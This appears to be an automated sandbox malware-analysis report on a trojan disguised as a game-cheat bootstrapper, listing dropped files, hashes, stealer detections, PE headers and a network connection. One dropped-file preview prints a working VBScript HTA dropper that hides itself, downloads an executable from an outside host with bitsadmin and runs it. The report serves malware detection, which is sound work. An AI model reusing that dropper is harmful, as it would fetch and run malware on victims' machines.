                                          C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeBootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):1.3234442710382834
                                            Encrypted:false
                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvro:KooCEYhgYEL0In
                                            MD5:2BB9D268C96C8367219117E7462E48A9
                                            SHA1:9AAA1B2A27E8E0FC98B54BD35FD1797EAC00ED89
                                            SHA-256:54C1AD4ADA0FEEDB3B4090673189C8CFCED280DD5B3F4EB903A971ED9818B271
                                            SHA-512:36830FCD3E7A92A0EB92739C86826C078B0786F19194E3B7632D81ED4E39F82458D66BB73C27E2680B4A1D297756A2AF2A632EF02DFA971599E2840B8F689569
                                            Malicious:false
                                            Reputation:low
                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x852dc0b9, page size 16384, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):0.42215743714096754
                                            Encrypted:false
                                            SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                            MD5:8178096ACF9C13ED2DC1D6CA8C7FA4A0
                                            SHA1:C9745FDF400AD10F7A961B71A91BBB0CC2A4F952
                                            SHA-256:8594CB32C4EB6A1A83C751719CEA8729177F8BCA9AF8C1EA631A5762881F5DCE
                                            SHA-512:5DEC009A7A972F41AF693F2348C585E85B467FACD415F3FD23ECBBEDA99268F9004888E1A6AF34859B0A25DCB468D9DC409D074BCDD68D59B00E995942839B27
                                            Malicious:false
                                            Reputation:low
                                            Preview:.-..... .......A.......X\...;...{......................0.!..........{A......|i.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................el.......|i...................d......|i..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.07702863859174698
                                            Encrypted:false
                                            SSDEEP:3:8ll8YeEP+05ejjn13a/24D1Zl/illcVO/lnlZMxZNQl:c8zN0Aj53q2LOewk
                                            MD5:90C168266C16C675CAEE004A1965CF03
                                            SHA1:A75F623CC0CA5572F35018C0FA49B912441FE68A
                                            SHA-256:12CC1A4F141055A43901037439AACA7A06AF0E1E7B4D57C32F307483E5DDF38C
                                            SHA-512:424C67376BBC3E4095C068B05C25C1467E11F3A749551950C9A1A090FEC8C9CB111508282CCED93B6BA2E19A67C22AA89FA195CB98A7E0FBEA111BD4F46E8694
                                            Malicious:false
                                            Reputation:low
                                            Preview:........................................;...{.......|i......{A..............{A......{A..........{A]..................d......|i.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):1.2316132178446182
                                            Encrypted:false
                                            SSDEEP:192:nBRNF2GYr0bU9+dQVa+xkl8vAEZizuiF0Z24lO8g:BJ2GnbG+dQVa+qehZizuiF0Y4lO8g
                                            MD5:6EE99E056ED1B46885F79D9098F2DA7C
                                            SHA1:C71D9F15531F0D503C7F3F1D3001A1E0A6AB87FB
                                            SHA-256:5104B59DBF63AF57CD1473CFC777DA68F1665179FC05259666CEE998088AF6CF
                                            SHA-512:9676DA91FA46276ECB7400CE88E3F39F05E622090AA1DFA1E79F169EE26673EA1723744876074CC6C669D82B4579F82931B48DDDEFDC1739E02915F5EB5A0BB4
                                            Malicious:false
                                            Reputation:low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.9.5.5.7.5.2.0.0.6.0.7.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.9.5.5.7.5.2.8.0.2.9.5.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.c.7.8.1.8.f.-.3.6.7.b.-.4.8.8.c.-.a.5.c.1.-.1.d.e.a.1.e.c.5.c.4.2.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.6.5.1.3.d.0.-.8.a.1.1.-.4.d.3.3.-.9.9.9.c.-.c.6.3.5.0.2.9.4.0.7.3.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r.V.1...1.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.4.-.0.0.0.1.-.0.0.1.4.-.e.d.0.6.-.0.d.5.0.2.2.0.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.e.2.7.e.f.f.4.c.d.4.d.3.8.3.f.5.c.5.6.4.c.c.e.2.b.d.1.a.a.a.2.f.f.e.4.
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Mini DuMP crash report, 16 streams, Mon Sep 16 10:22:32 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):583644
                                            Entropy (8bit):3.219558383892526
                                            Encrypted:false
                                            SSDEEP:6144:1ajuKR+bGxIl3rc0A+mD/MLwkqWhz3QTT:cC9bGwYD/MLBq+Q
                                            MD5:6393FA891F7B853C7220F5FB451CEBAE
                                            SHA1:D144AB591AB4153EEF21031AA11E11E38CE045C7
                                            SHA-256:E2525FCCE0E827295C5262141F288EAE4E1BDCAF8DD5F373749F71939DCE379B
                                            SHA-512:5BD2D8270F2D4A32022FEA7BED3A75AC4155D6FF8D90D767DAB0A236D6CD6ECBFD9AECF1B1DE68D091EBB64574DEC48ED7BE86F9B3C5149D7BDE3489892BFBD4
                                            Malicious:false
                                            Preview:MDMP..a..... ..........f............4...........d...T.......<....(....... ...(......TX.............l.......8...........T............U.............|I..........hK..............................................................................eJ.......L......Lw......................T.......t......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):6820
                                            Entropy (8bit):3.7180438023880322
                                            Encrypted:false
                                            SSDEEP:96:RSIU6o7wVetbxqMsRXYZL/8n1vm5aM4U389b44Dr4rVfrIm:R6l7wVeJxqFRXYZj81Gpr389b44cfrIm
                                            MD5:8A6C5D4761801CB13EF373DCAD704BD5
                                            SHA1:36AE52419DED28A1C07F560D0CABA843B7819A5D
                                            SHA-256:F549ACD3831B9D3992C42C0D5A8DCDBA793019C4399AFEB851ECF10C4A79C399
                                            SHA-512:54EA5B47163DED8983229E97AB985EE31B5E4553BC985D895096A513D180351696463F91B7ACE81F75CE5E317FF74435C0AC11FE0D8887E4457B9C615B4BF116
                                            Malicious:false
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.1.6.<./.P.i.
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4834
                                            Entropy (8bit):4.46573552928604
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zssJg771I91KWpW8VYxYm8M4JM/Ftyq8vyvZew0Md:uIjfqI76r7V9JmWaZeFMd
                                            MD5:80BB6A3A6C07FC1649731C1D4E8CB897
                                            SHA1:3C2B3BD5B5B81F202CF5083F401E228B95A49327
                                            SHA-256:28765EC0C90183297CF2DBC86DFB83461E0A448C46D58C3742579A670D5626F1
                                            SHA-512:AFB086081095555B380D6DCAE1D50DF1967AA3C8B5CAC4F06FEBC88B31BECF783C3CDA7336E9BF04C2809A723E581498AF2AA50CD160D06BC7CF655C6D5E4231
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="502645" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):654
                                            Entropy (8bit):5.380476433908377
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):80384
                                            Entropy (8bit):0.7660406673087843
                                            Encrypted:false
                                            SSDEEP:192:BTeTVUkbERHs1pWA4avskoY6g1KbbCcDD:wVUkyHs1pig6g17cX
                                            MD5:75C85B7E8AB404F086BC180768B67081
                                            SHA1:8D1E90B4C05C0F056AF593736B0305C5D7CF518B
                                            SHA-256:553BC97BCBE4671D4B76082B03B65AD6B9517B3AAF83D850400D64258CE68BBB
                                            SHA-512:1218AB14ED88ADE7DCA8E7C98E41D84240523678FFA8276DFFA96D2A5332711CE35C59A3E3226717A532BF9C34CA23D3782C86962138478A768DE714F1E913FB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................0...........O... ...`....@.. ....................................@..................................N..S....`............................................................................... ............... ..H............text...$/... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................O......H........n..(.......&.....................................................(....*.r...p*. `..*..(....*.r/..p*. ~.H.*.s.........s.........s.........s.........*.r]..p*. S...*.r...p*.r...p*.r...p*. ...*.r...p*. .O..*..((...*.r0..p*.r^..p*. ....*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(a...*"(....+.*&()...&+.*.+5so... .... .'..op...(,...~....-.(b...(T...~....oq...&.-.*.r...p*.r...p*. Q.O.*.r...p*. 6...*.r&..p*.rT..p*. O...*.r...p*. ..a.*.r...p*. ....*.r...p*.r...p*. .x!.*.r:.
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):995840
                                            Entropy (8bit):5.630174987352983
                                            Encrypted:false
                                            SSDEEP:24576:DIbp4sZotkNjFC/4qxp+k+kPFoHZvPrSMc:cvotkNjg/lhqZvG
                                            MD5:90FD25CED85FE6DB28D21AE7D1F02E2C
                                            SHA1:E27EFF4CD4D383F5C564CCE2BD1AAA2FFE4EC056
                                            SHA-256:97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F
                                            SHA-512:1C775CF8DFDE037EAA98EB14088C70D74923F0F6A83030A71F2F4C1A4453F6154DAB7A4AA175E429860BADDA3E5E0AE226F3C3E8171332F5962BF36F8AA073FA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 75%
                                            Joe Sandbox View:
                                            • Filename: BootstrapperV1.19.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...an.f.........."......(..........rF... ....@...... ....................................`..................................................F..T....`..u............................................................................F............... ..H............text....&... ...(.................. ..`.rsrc...u....`.......*..............@..@.reloc...............0..............@..BH........P..\............................................................0*...........(....r...p(....s......r...po.....sq......o.....ow...o....r...po....9,....ow...rD..poj.....9.....rp..pr|..po2..............9.....o..........&......r|..p.....s........o......r~..p~....r...p(....o......r...po.............9......o..........&..........:......r|..p(....98....s........r...po.............9......o..........&........r...p(....9....r...p(......(....9....r...p..(....s........o......r~..p~....r.
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):827
                                            Entropy (8bit):5.298344908566429
                                            Encrypted:false
                                            SSDEEP:24:hMNmMvy4GqptE0ia5WNp8xuY8y+shEr88+M8E4olEC:ImMqopO0Jqd4+sGXt40F
                                            MD5:702C5998DD6D976C132C044F3A1AC842
                                            SHA1:C96E3B78885214A5652C4D44233BACEED1D93AF3
                                            SHA-256:5F7FFB6600B1AA604090C18B79367DDE254847E01DBE0A8027BA83F8216B51DF
                                            SHA-512:23F3E80C4847CEEF98ABA552B82964A847582D095FED4C8F7069CCE747EC09327D3D7A69403A826972A7C51431947B312A0457201379110F2BFC2008B9D90E2B
                                            Malicious:true
                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">.. <head>.. <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />.. <script language="VBScript">..Window.ReSizeTo 0, 0..Window.MoveTo -4000, -4000..set oShell = CreateObject("WScript.Shell")..Dim Str..Str = "%Temp%" & "\cheat.exe"..const DontWaitUntilFinished = false, ShowWindow = 1, DontShowWindow = 0, WaitUntilFinished = true..oShell.Run "bitsadmin /transfer 8 https://envs.sh/wUB.exe " & Str, DontShowWindow, WaitUntilFinished..oShell.Run Str..Close.. </script>.. <hta:application id="oHTA" applicationname="Bonjour" application="yes" width="10px" height="10px"></hta:application>.. </head>.. <body>.. </body>..</html>......
                                            Process:C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):103
                                            Entropy (8bit):3.9770111444684244
                                            Encrypted:false
                                            SSDEEP:3:XSWHlkHFWKBmGBnLHfYhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0amGBzwLkWFfx/52uyPm
                                            MD5:487AB53955A5EA101720115F32237A45
                                            SHA1:C59D22F8BC8005694505ADDEF88F7968C8D393D3
                                            SHA-256:D64354A111FD859A08552F6738FECD8C5594475E8C03BB37546812A205D0D368
                                            SHA-512:468689D98645C9F32813D833A07BBCF96FE0DE4593F4F4DC6757501FBCE8E9951D21A8AA4A7050A87A904D203F521134328D426D4E6AB9F20E7E759769003B7C
                                            Malicious:false
                                            Preview:{. "args" : {. "code" : "xRCaC7cdBn". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.465729750120641
                                            Encrypted:false
                                            SSDEEP:6144:xIXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNRdwBCswSby:SXD94VWlLZMM6YFHD+y
                                            MD5:124A5E4456F5085D7D2062C1EE5091EE
                                            SHA1:0297D159BED514EFF13175232124F2F0E215D229
                                            SHA-256:5422A2D0AB0AC9643F89FB7B792747255C1BDE2F2FDE1C049486A5CD107EF55D
                                            SHA-512:C84AFCA39020E7CA17719E1864DAEBA2370FE8DFA659A568AC00E29514DDD0387797103110A2D224F01631393FE9F078B2908941D792AA1995EE338F66788D11
                                            Malicious:false
                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..V"...............................................................................................................................................................................................................................................................................................................................................J..b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            File Type:ISO-8859 text, with CRLF, LF line terminators
                                            Category:dropped
                                            Size (bytes):571
                                            Entropy (8bit):4.9398118662542965
                                            Encrypted:false
                                            SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
                                            MD5:5294778E41EE83E1F1E78B56466AD690
                                            SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
                                            SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
                                            SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
                                            Preview:.............................................................------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.9964618702622134
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File size:1'010'176 bytes
                                            MD5:7afabb528ce69e3a40dec6c3253ef854
                                            SHA1:5161cc329e2fdda24218898bf637bb47a29daea2
                                            SHA256:130b8c87664cf95a9fee611a0c14098a4da51f6b768260ad40a7d28ff895aaf0
                                            SHA512:7eae4d625dfa0313eb3e4c73e5306d0d49d84bc30cfd6d5be41797d315926d7427ac2733206e6263e72c687193ad21737e649cba0fe79bad1798d93c1f18fe5f
                                            SSDEEP:24576:W70v2bR+kpZKDxCUGhJqBAJzJi6adwBih5u5eQp0U:Z2bR+k+VK42z0XwIKp0U
                                            TLSH:29252310028802C3D57A7EB730AE776EC69BD119B9EF0D97F3A917B3063557B8A016D2
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F!.f.................`..........~~... ........@.. ....................................@................................
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x4f7e7e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66E72146 [Sun Sep 15 18:02:46 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf7e2c0x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf80000x4ce.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xfa0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xf5e840xf6000fc12603564eda3f35e416db8fa213c5eFalse0.9380250015879065data7.998024903988678IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xf80000x4ce0x600d1bb5ddcae2985391dfb14e9099788c0False0.3743489583333333data3.7194301486493373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xfa0000xc0x200a8c352392b962b89a6d310ddf9f9e069False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xf80a00x244data0.4706896551724138
                                            RT_MANIFEST0xf82e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 16, 2024 12:22:23.294150114 CEST49731443192.168.2.4104.21.93.27
